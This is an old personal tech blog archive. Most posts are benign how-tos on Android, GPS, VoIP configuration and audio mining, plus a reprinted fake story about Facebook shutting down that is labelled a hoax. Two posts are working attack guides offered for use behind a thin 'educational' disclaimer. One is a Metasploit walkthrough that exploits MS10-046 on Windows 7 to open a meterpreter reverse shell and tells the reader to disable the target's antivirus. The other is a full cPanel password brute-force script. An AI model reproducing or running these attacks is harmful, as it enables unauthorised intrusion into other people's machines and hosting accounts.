METASPLOIT: Hacking windows 7 exploit December 17, 2011
Posted by hasnain110 in Uncategorized.add a comment
Hey Guys. I will be giving a quick dirty how-to of exploiting a windows velunurbility to login to remove system with out username and password using Metasploit
Requirements:
1. MetaSploit Installed (Preferably BackTrac)
2. Ruby Installed (Install all the package of Ruby to avoid any issues)
3. Two OS running either on same as virtual or physically different
4. Target host must not be running any AV
Here are the quick Steps.
SCENARIO:
Machine 1: Host Linux Machine
Machine 2: Target Windows 7 Machine
Step 1:
Download and Install Metasploit Framework Source Code on the Machine 1. I prefer downloading from SVN. run the given below command on CLI
svn co https://www.metasploit.com/svn/framework3/trunk/
OR
Download directly from here:http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
Step 2:
Locate the file msfconsole. In my case it was under /opt/framework-x.x.x/app
Run it as ruby msfconsole
Step 3:
Now once you get the msf> prompt type the below command
search LNK
and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Step 4:
Now once we have found the desired module we will use this exploit by typing the below command
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image
Step 5:
Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload
set payload windows/meterpreter/reverse_tcp
Step 6:
Now its time to do some configuration for the exploit/payload that we have just set. type the given command
show options
You should get below default output.
Step 7:
Now we have to set the local host to listen. Type the given below two commands
set SRVHOST x.x.x.x ( This will be your HOST IP address running metasploit )
Then run
set LHOST x.x.x.x ( This will be also be your HOST IP address running metasploit)
Step 8:
Now check if the above applied configuration is applied
Step 9:
Now Finally we will start to exploit. Run the command Exploit
Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)
Seems like all is ok till now 
Step 10:
On any Client machine simply open Internet Explorer and try to open http://x.x.x.x (IP of the MetaSploit server)
Note: it will give your a pop-up asking from permission click ALLOW.
**Make sure you do not have any AntiVirus running on the target PC
Step 11:
Once connection is established you should see something like below
Step 12:
You can check the number of successful connected session by running the command sessons in msf console
Step 13
Now as we can see that we have one victim connected its time to login to the system. run the command session –i 1
Once connected type linux command to browse inside the System..Enjoy
Final Step:
This Documentation is purely for educational purpose. using it ethically or viciously its your individual act .
Use it responsibly. Comment if you like the post
Ending Note: Can not explain the details of each step due to lack of time:
Run Android on Laptop/Netbook November 18, 2011
Posted by hasnain110 in Uncategorized.add a comment
Hey..Ever wonder that you can actually run the android on your laptop? Yes it is possible.
You will be needing a USB Flash drive with minimum 256 MB storage size and make sure all the data is deleted inside.
To make it easier I will be explain it step-by-step
Step1:
Get any USB Flash drive with minimum 256 MB empty storage
Step 2:
Download the Android .iso from
Step 3:
Once step 2 is done now download the software UNetbootin from and install/run it
Step 4:
Now run the software UNetbootin click the bullet beside Diskimage, then click the “… “ button and select the Android ISO file you just downloaded. Finally, select the correct flash drive or memory card in the menu on the bottom, and click Ok
The software will extract and copy the files into your USB making it boot-able
Step 5
Once extracted the software will ask you to reboot the system , Restart the system and make sure that system is configured to boot from USB
Conclusion
Enjoy the power of a super FAST mobile OS running on a laptop. although it not too stable but still worth trying. Do not need to worry about messing up with your existing system setting as its running directly from USB, Someday it will surely replace LIVE Distros !
If you find this post helpful and easy please do comment
Howto use HTC Mobile GPS on PC/GoogleEarth June 25, 2011
Posted by hasnain110 in Uncategorized.add a comment
Hey Fellow
Finllay after spending many days of exploring how to use my HTC Wildfire GPS on my laptop finally I have figured out the science of how to get it done. Over internet there is load of information of getting it done but I found it really really poor as the steps are a little complicated so I’m here writing this easy howto of getting it done
In this guide you will learn how to use your android phone as a standalone gps for google earth on pc.
Note: Your phone and computer must have bluetooth.
1. Download and install google earth on your pc.
2. Download GooPsPro2_5_3Beta.exe -Thanks developer Dave for compatiblity code change
3. Download and install BlueNMEA from Android Market
Setup:
1. Install th BlueNMEA softwar onto your Android from this link (http://max.kellermann.name/download/blue-nmea/BlueNMEA-2.1.2.apk) once installed run only without making any change in the software. Make sure the GPS option is selected and TCP STATUS should be listening on port XYZ ( in case if it shows already listening please give a soft reboot to your HTC and do the same again)
2. Once install pair your HTC with your laptop , while pairing you will find a popup baloon in the system tray showing that the windows is trying to download and install some update/drivers.. let the windows finish its job
3. Once pairing is done goto the settings of bluetooth on your laptop click on the second tab COM PORTS and make sure you have an outgoing ports already created for BLUENMEA by Window while system performing Step 2
3. Start the Goops program you downloaded earlier. Goto options and select the com port you saw associated with BlueNMEA software . Uncheck Autoconnect, Autoscan and Compress.
4. Now press Connect on the GOOPS program , GoogleEarth should open and Goops will say opening COM”#”: #- the number you selected
5. On your phone open BlueMNEA,your bluetooth pc should be listed, select it. If all went well it will establish a connection and you will then have gps on your pc. If it doesnt connect, often trying again will fix it. If not, something else is wrong.
It worked for me great. Let your comments if you have any confusion and will try my best to reply ASAP
BruteForce tool using linux shell script June 17, 2011
Posted by hasnain110 in Uncategorized.add a comment
Hello, did you ever try to brute force a website login page and you didn’t find the right tool?
it always happen, so i will explain how i did it with linux shell script.
I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | ‘__| | | |/ _ \/ _` | __| ‘_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|
#############################
echo “.::Cpanel BruteForcer By Dr.Death::.”
echo
echo -n “Enter domain name for the Cpanel account you want bruteforce:
> “
read site
n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do
password=`sed -n "$i"p pass_list`
b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
echo trying password $password
if [ ! -z "$b" ]; then
echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun 
"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================
lets explain what we did:
#!/usr/bin/env bash
to execute the script using bash shell from the environment "env".
read site
set the user input as variable "$site" which will be the website domain name.
n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.
for (( i=1; i <= $n; i++));
we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.
password=`sed -n "$i"p pass_list`
here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.
b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"
so password file pass_list should include the usernames and passwords in this format: "username:password"
if [ ! -z "$b" ]; then
here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.
Note: You will need your own password dictionary file to make it work
Freeswitch Step by step Howto February 3, 2011
Posted by hasnain110 in Uncategorized.1 comment so far
Step 1
edit vars.xml and it should look like this
<!– Internal SIP Profile –>
<X-PRE-PROCESS cmd="set" data="internal_auth_calls=true"/>
<X-PRE-PROCESS cmd="set" data="internal_sip_port=5080"/>
<X-PRE-PROCESS cmd="set" data="internal_tls_port=5081"/>
<X-PRE-PROCESS cmd="set" data="internal_ssl_enable=false"/>
<X-PRE-PROCESS cmd="set" data="internal_ssl_dir=$${base_dir}/conf/ssl"/>
<!– External SIP Profile –>
<X-PRE-PROCESS cmd="set" data="external_auth_calls=false"/>
<X-PRE-PROCESS cmd="set" data="external_sip_port=5060"/>
<X-PRE-PROCESS cmd="set" data="external_tls_port=5061"/>
<X-PRE-PROCESS cmd="set" data="external_ssl_enable=false"/>
<X-PRE-PROCESS cmd="set" data="external_ssl_dir=$${base_dir}/conf/ssl"/>
and
<X-PRE-PROCESS cmd="set" data="global_codec_prefs=G729,G723,G711U"/>
<X-PRE-PROCESS cmd="set" data="outbound_codec_prefs=G729,G723,G711U"/>
Step 2:
All Termination GW will be added now under /usr/local/freeswitch/conf/sip_profiles/external
create gw.xml and it should look like this
<include>
<gateway name="broadvoice1">
<param name="username" value="4234685032 "/>
<param name="realm" value="4234685032 "/>
<param name="from-domain" value="174.136.52.143"/>
<param name="password" value="sipsip"/>
<param name="extension" value="5555551234"/>
<param name="proxy" value="174.136.52.143"/> <!– example using the broadvoice DNS SRV record for New York City. –>
<param name="expire-seconds" value="3600"/>
<param name="register" value="false"/>
<param name="retry-seconds" value="6"/>
</gateway>
</include>
Step 3:
Now create a Ingress GW
Goto/usr/local/freeswitch/conf/autoload_configs and edit acl.conf.xml
vi acl.conf.xml and add this in the bottom
<list name="asterisk_box" default="allow">
<node type="allow" cidr="216.218.233.194/32"/>
</list>
now we have to apply this ACL in /usr/local/freeswitch/conf/sip_profiles/internal.xml
vi internal.xml
add this line at the bottom
<param name="apply-inbound-acl" value="asterisk_box"/>
Step 4:
Now create a Dial plan
goto /usr/local/freeswitch/conf/dialplan
vi public.xml
<extension name="outbound_international">
<condition field="destination_number" expression="7243(\d+)$">
<!–<action application="set" data="absolute_codec_string=G729"/>–>
<action application="bridge" data="{absolute_codec_string=’G729′}sofia/gateway/broadvoice1/7243$1"/>
</condition>
</extension>
Step 5
Now start the freeswitch and make the calls
Asterisk Video Support January 23, 2011
Posted by hasnain110 in Uncategorized.1 comment so far
In order to enable video in Asterisk, modify sip.conf to add:
[general]
videosupport=yes
Also better to add the video codecs in the extensions if the video call is from in from extension to extension
For example:
[video2]
type=friend
username=video2
secret=hidden
host=dynamic
context=from-camera
callerid=Video 2 <1222>
canreinvite=no
disallow=all ; Windows Messenger will choose wrong codecs if you allow=all
allow=ulaw
allow=alaw
allow=speex
allow=gsm
allow=h261
allow=h263
allow=h263p
Enjoy the video call ! 
FACEBOOK WILL END ON MARCH 15th! January 9, 2011
Posted by hasnain110 in Uncategorized.1 comment so far
HOAX of the Year 2011
PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March. Managing the site has become too stressful.
“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”
Zuckerberg went on to explain that starting March 15th, users will no longer be able to access their Facebook accounts.
“After March 15th the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back once Facebook goes out of business.”
Zuckerberg said that the decision to shut down Facebook was difficult, but that he does not think people will be upset.
“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”
Some Facebook users were furious upon hearing the shocking news.
“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”
However, parents across the country have been experiencing a long anticipated sense of relief.
“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”
Those in the financial circuit are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.
But Zuckerberg remains unruffled by these accusations. He says he will stand by his decision to give Facebook the axe.
“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”
The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th. After that date, all photos, notes, links, and videos will be permanently erased.
Take from HERE
What is Audio Mining .. ? January 6, 2011
Posted by hasnain110 in Uncategorized.9 comments
Audio mining approaches
There are two main approaches to audio mining.
Text-based indexing. Text-based indexing, also known as large-vocabulary continuous speech recognition (LVCSR), converts speech to text and then identifies words in a dictionary that can contain up to several hundred thousand entries. If a word or name is not in the dictionary, the LVCSR system will choose the most similar word it can find.
The system uses language understanding to create a confidence level for its findings. For findings with less than a 100 percent confidence level, the system offers other possible word matches, said Professor Dan Ellis, who leads Columbia University’s Laboratory for Recognition and Organization of Speech and Audio (http://labrosa.ee.columbia.edu).
Thus, an LVCSR system can enhance its accuracy level by storing words that sound much like other words, although this approach also generates some wrong results.
Phoneme-based indexing. Phoneme-based indexing doesn’t convert speech to text but instead works only with sounds.
The system first analyzes and identifies sounds in a piece of audio content to create a phonetic-based index. It then uses a dictionary of several dozen phonemes to convert a user’s search term to the correct phoneme string. (Phonemes are the smallest unit of speech that distinguishes one utterance from another. For example, "ai", "eigh", and "ey" are the long "a" phoneme. Each language has a finite set of phonemes, and all words are sets of phonemes.) Finally, the system looks for the search terms in the index.
"A phonetic system requires a more proprietary search tool because it must phoneticize the query term, then try to match it with the existing phonetic-string output," Weideman said. This is considerably more complex than using one of the many existing text-based search tools.
Phoneme-based searches can result in more false matches than the text-based approach, particularly for short search terms, because many words sound alike or sound like parts of other words. For example, Weideman explained, a search for the word "ray" might get a match from within the word "trading."
According to Ellis, it’s difficult for a phonetic system to accurately classify a phoneme except by recognizing the entire word that it is part of or by understanding that a language permits only certain phoneme sequences.
However, he added, phonetic indexing can still be useful if the analyzed material contains important words that are likely to be missing from a text system’s dictionary, such as foreign terms and names of people and places.
How the technology works
Text- and phoneme-based systems operate in much the same way, except that the former uses a text-based dictionary and the latter uses a phonetic dictionary.
The most important and complex component technology for audio mining is speech recognition. In these systems, explained University of Texas Assistant Professor Latifur R. Khan, "A speech recognizer converts the observed acoustic signal into the corresponding [written] representation of the spoken [words]."
Speech recognition software contains acoustic models of the way in which all phonemes are represented. Also, TMA’s Meisel said, there is a statistical language model that indicates how likely words are to follow each other in a specific language. By using these capabilities, as well as complex probability analysis, the technology can take a speech signal of unknown content and convert it to a series of words from the program’s dictionary.
Khan noted that this process is more difficult with highly inflected languages, such as Chinese, in which tonality changes the meaning of a word.
Some audio mining dictionaries are domain specific, for use by professionals in different fields, such as law or medicine. In any event, users can update dictionaries, usually manually but sometimes automatically by scanning Web sites or other sources into an audio mining product.
Some products, such as ScanSoft’s AudioMining Development System, use XML’s ability to tag data so that it can be read by other XML-capable systems, ScanSoft’s Weideman noted. This lets the product export speech index information to other systems, he said.
Performance
By working with powerful host-system processors, large memories, and efficient algorithms, most audio mining technology provides high performance levels.
For example, Fast-Talk says its newest technology can index a one-hour audio file in five minutes, and can process 30 hours of content per second in response to a specific, 10-phoneme search query in a host system running a 2.53-GHz Pentium CPU.
Note: This information is taken from here
BlackBerry VoIP/SIP softphone is finally available January 4, 2011
Posted by hasnain110 in Uncategorized.4 comments
BlackVoib is a generic SIP client for GSM BlackBerry devices. It allows the user to make/receive SIP calls on the internet via WIFI or OTA through a SIP service provider or a SIP server run by the user.
Features
1. User controls all SIP account settings.
2. Supports more recent BlackBerry GSM phones only.
3. Supports G.711 ulaw and alaw codecs.
4. DTMF passthru via SIP INFO.
5. Speaker Phone and Handset can be toggled.
6. Volume Controls.
7. BlackBerry phone book integration.
8. Supports separate authentication ID.
9. Can contact server with a different port other than the default 5060.
10. Can use a different port other than the default 5060 as local port.
——————————————————————————————————————–
Download Click here
hasnain110
